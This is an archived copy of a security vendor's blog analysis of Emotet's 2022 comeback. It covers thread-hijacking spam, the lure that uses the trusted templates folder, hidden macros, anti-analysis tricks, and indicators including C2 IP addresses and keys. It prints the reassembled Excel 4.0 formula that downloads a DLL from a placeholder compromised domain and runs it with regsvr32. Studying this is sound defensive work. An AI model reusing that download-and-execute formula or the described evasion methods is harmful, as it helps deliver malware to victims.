{
	"id": "ae388efa-1ddf-4be0-9a2b-6db329525bc7",
	"created_at": "2026-04-06T00:14:11.642915Z",
	"updated_at": "2026-04-10T03:22:01.822737Z",
	"deleted_at": null,
	"sha1_hash": "685c58f790f4e06a82c9a962cd9da2e1f823c2e3",
	"title": "Emotet’s Vacation is Over: No Rest for the Wicked | Deep Instinct",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1786043,
	"plain_text": "Emotet’s Vacation is Over: No Rest for the Wicked | Deep Instinct\r\nBy Simon KeninThreat Intelligence ResearcherMark VaitzmanSecurity and Threat Research Team Leader\r\nPublished: 2022-11-17 · Archived: 2026-04-05 15:49:44 UTC\r\nEmotet is a prolific malware botnet that originally functioned as a banking trojan when it emerged in 2014. It was\r\nspread via spam campaigns, imitating financial statements, transfers, and payment invoices. Emotet is propagated\r\nmostly via Office email attachments containing a macro. If enabled, it downloads a malicious PE file (Emotet)\r\nwhich is then executed.\r\nThe Emotet operation was disrupted in early 2021, but after few a few months of inactivity for what we will call\r\n\"summer vacation,\" it has re-emerged with nearly daily activity since mid-October.\r\nFigure 1: Emotet activity showing no new spam from mid-July until start of November (Source:\r\nMalwareBazaar*)\r\nThe first thing the botnet operators did upon re-emergence was update currently infected computers with new\r\nversions of the malware:\r\nhttps://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked\r\nPage 1 of 16\n\nFigure 2: Observed initial Emotet activity after vacation (Source: Twitter†)\r\nDelivery via Thread Hijacking Email \r\nThe current wave of Emotet malspam is delivered via “thread hijacking” emails. The attachments come in both\r\npassword-protected zips as well as plain attachments: \r\nhttps://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked\r\nPage 2 of 16\n\nFigure 3: Email containing a password protected zip attachment\r\nFigure 4: Emotet’s malicious Office attachment without a password protected zip\r\nChanges in Emotet Malspam\r\nhttps://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked\r\nPage 3 of 16\n\nBefore going on vacation, Emotet malspam consisted of XLS files with an Excel 4.0 macro. \r\nThe files contained a simple social engineering image that asks the victim to enable content which will cause the\r\nmacro to execute:\r\nFigure 5: Emotet XLS file from July\r\n(a2daa1b6f2dccc95e9a7d8d89932c7d7936aa2e53bbf4921f81f5b38257d5894)\r\nAfter vacation ended, the Emotet wave still includes XLS files, however, the social engineering element has\r\nchanged: \r\nFigure 6: New social engineering lure used by Emotet\r\nThe victim is asked to copy and execute the file from the templates folder of Microsoft Office.\r\nExecuting Office files from this location bypasses the security warning and the Excel 4.0 macro is executed\r\nautomatically when the file is opened: \r\nhttps://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked\r\nPage 4 of 16\n\nFigure 7: The templates folder is a trusted location allowing auto execution of macros\r\nAdvice: Cybersecurity and IT teams should either disable trusted locations and/or limit write access to\r\nsuch locations to unprivileged users, as well as proactively hunt for suspicious executions from those\r\nlocations.\r\nBesides this social engineering piece, the techniques used by Emotet didn’t change much. When manually\r\nchecking the sheets, they look empty, however, they contain hidden values:\r\nFigure 8: “Empty” sheets used by Emotet\r\nThe auto_open macro is also hidden: \r\nhttps://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked\r\nPage 5 of 16\n\nFigure 9: Hidden column containing “Auto_Open” macro\r\nThe formula concatenates values from different cells to eventually assemble, download, and execute the Emotet\r\nDLL. This is done to avoid static detection of common endpoint solutions.\r\nThe end results should look like this:\r\n =FORMULA(=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"https://compromised_domain/random/path/\",\r\n =FORMULA(=EXEC(\"C:\\Windows\\System32\\regsvr32.exe ..\\oxnv1.ooccxx\"),G18)\r\nThe Emotet Payload \r\nEmotet operations moved from PE32 to PE64 executables in mid 2022, adding several new features and\r\nrebuilding some of its older code. The overall structure remained the same.\r\nFigure 10: PE64 new Emotet (DetectItEasy)\r\nFrom the configuration extraction of Emotet we can see the malicious IPs list, as well as evidence of them using\r\nthe epoch4 botnet and the ECDH and ECDSA keys (See IOCs table).\r\nIn an attempt to look like a legitimate application when scanned, Emotet is using C++ libraries licensed by\r\nDinkumWare.\r\nFigure 11: Dinkumware C++ library.\r\nhttps://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked\r\nPage 6 of 16\n\nFigure 12: Dinkumware website (www.dinkumware.com)\r\nAdditionally, Emotet has a few loops to mimic legitimate behavior during runtime, for example “printing benign\r\nstrings.”\r\nFigure 13: Print benign strings function\r\nEven building a Sudoku and checking your board number (not really…)\r\nhttps://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked\r\nPage 7 of 16\n\nFigure 14: Benign String\r\nThe Real Emotet Job\r\nThe final DLL is decrypted and uploaded to memory during runtime, making investigation and detection more\r\ndifficult. Even the API call to VirtualAlloc is obfuscated, like their older version, and the address of the API is\r\nretrieved dynamically. The parameters of the call are saved as a STRING and converted to INT during runtime.\r\nYou can read more on that technique in the previous blog by Deep Instinct\r\nhttps://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked\r\nPage 8 of 16\n\nFigure 15: VirtualAlloc detection evasion\r\nThe payload itself is encrypted and then encoded using base64:\r\nFigure 16: Encrypted payload in base64\r\nOnce the malware is executed, it decodes the base64 text into binary data:\r\nhttps://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked\r\nPage 9 of 16\n\nFigure 17: Base64 binary data\r\nThe binary data is then decrypted and we finally get the payload, easily identified by the “MZ… this program\r\ncannot be run in DOS mode.”\r\nhttps://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked\r\nPage 10 of 16\n\nFigure 18: Final payload revealed\r\nSome other artifacts that are similar to the previous generation of Emotet include the following:\r\nEmpty import table\r\nhttps://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked\r\nPage 11 of 16\n\nFigure 19: Empty Import table\r\nMinimal informative string\r\nFigure 20: String of the executable file\r\nSimilar code flow flattening technique\r\nhttps://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked\r\nPage 12 of 16\n\nFigure 21: Code flow of Emotet\r\nYou can read more about these techniques in Deep Instinct’s previous blog about Emotet.\r\nThe multi-step techniques detailed result in late detection only when the decrypted PE is uploaded to the memory,\r\ntherefore, we see a low detection rate in VT for the initial DLL, while the decrypted DLL gets a higher detection\r\nrate.\r\nFigure 22: Initial Emotet Dll\r\nhttps://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked\r\nPage 13 of 16\n\nFigure 23: Final Emotet payload\r\nConclusion\r\nEmotet has returned to send malspam after a few months of summer break.\r\nThe current waves don’t show much change from those before their vacation; they’re still trying to bypass\r\ndetection by making some minor changes, adding benign code blocks, and moving to PE64.\r\nEmotet has slightly altered its techniques and TTPs over the years as the threat landscape shifts in favor of new\r\ninitial infection vectors and new bypassing methods.\r\nWe wouldn’t be surprised if we saw Emotet shift from Excel 4.0 macros to another initial infection vector that\r\nwould yield them more successful infections in the near-term future.\r\nDeep Instinct customers are protected from the new Emotet campaign by multiple protection layers, both statically\r\nand dynamically, resulting in pre-execution prevention.\r\nFigure 24: Static engine prevention for Emotet’s malicious Office file\r\nIOC\r\nhttps://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked\r\nPage 14 of 16\n\nPassword Protected Zip samples Plain Attachment samples\r\nZIP 19c43584bd90e6507ba4a4dad59fdf3a N/A\r\nXLS e99144862c6a3bb1d25846e962dc1633 893f9b10a48073fc3fa0d5c8867f7200\r\nDLL b0ebf252754995807a8fe9dca7a063b8 bf488b48716275f2e3dc9efc7fea4aea\r\nDLL\r\nDecrypted\r\n236AE63E2AC25B35EDBCECA4443BD95F\r\nC2\r\n45.235.8.30:8080\r\n94.23.45.86:4143\r\n119.59.103.152:8080\r\n169.60.181.70:8080\r\n164.68.99.3:8080\r\n172.105.226.75:8080\r\n107.170.39.149:8080\r\n206.189.28.199:8080\r\n1.234.2.232:8080\r\n188.44.20.25:443\r\n186.194.240.217:443\r\n103.43.75.120:443\r\n149.28.143.92:443\r\n159.89.202.34:443\r\n209.97.163.214:443\r\n183.111.227.137:8080\r\n129.232.188.93:443\r\n139.59.126.41:443\r\n110.232.117.186:8080\r\n139.59.56.73:8080\r\n103.75.201.2:443\r\n91.207.28.33:8080\r\n164.90.222.65:443\r\n197.242.150.244:8080\r\n212.24.98.99:8080\r\n51.161.73.194:443\r\n115.68.227.76:8080\r\n159.65.88.10:8080\r\n201.94.166.162:443\r\n95.217.221.146:8080\r\n173.212.193.249:8080\r\n82.223.21.224:8080\r\n103.132.242.26:8080\r\n213.239.212.5:443\r\n153.126.146.25:7080\r\n45.176.232.124:443\r\n182.162.143.56:443\r\n169.57.156.166:8080\r\n159.65.140.115:443\r\n163.44.196.120:8080\r\n172.104.251.154:8080\r\n167.172.253.162:8080\r\n91.187.140.35:8080\r\n45.118.115.99:8080\r\n147.139.166.154:8080\r\n72.15.201.15:8080\r\n149.56.131.28:8080\r\n167.172.199.165:8080\r\n101.50.0.91:8080\r\n160.16.142.56:8080\r\n185.4.135.165:8080\r\n104.168.155.143:8080\r\n79.137.35.198:8080\r\n5.135.159.50:443\r\n187.63.160.88:80\r\nhttps://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked\r\nPage 15 of 16\n\nPassword Protected Zip samples Plain Attachment samples\r\nEck1\r\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuw\r\nTyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuqzx+58sdg==\r\nEck2\r\nMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9Xoov\r\npqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSPBghxjZdDxY+Q==\r\nReferences\r\n* Figure 1: MalwareBazaar\r\n† Figure 2: Twitter\r\nSource: https://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked\r\nhttps://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked"
	],
	"report_names": [
		"emotet-vacation-is-over-no-rest-for-the-wicked"
	],
	"threat_actors": [],
	"ts_created_at": 1775434451,
	"ts_updated_at": 1775791321,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/685c58f790f4e06a82c9a962cd9da2e1f823c2e3.pdf",
		"text": "https://archive.orkl.eu/685c58f790f4e06a82c9a962cd9da2e1f823c2e3.txt",
		"img": "https://archive.orkl.eu/685c58f790f4e06a82c9a962cd9da2e1f823c2e3.jpg"
	}
}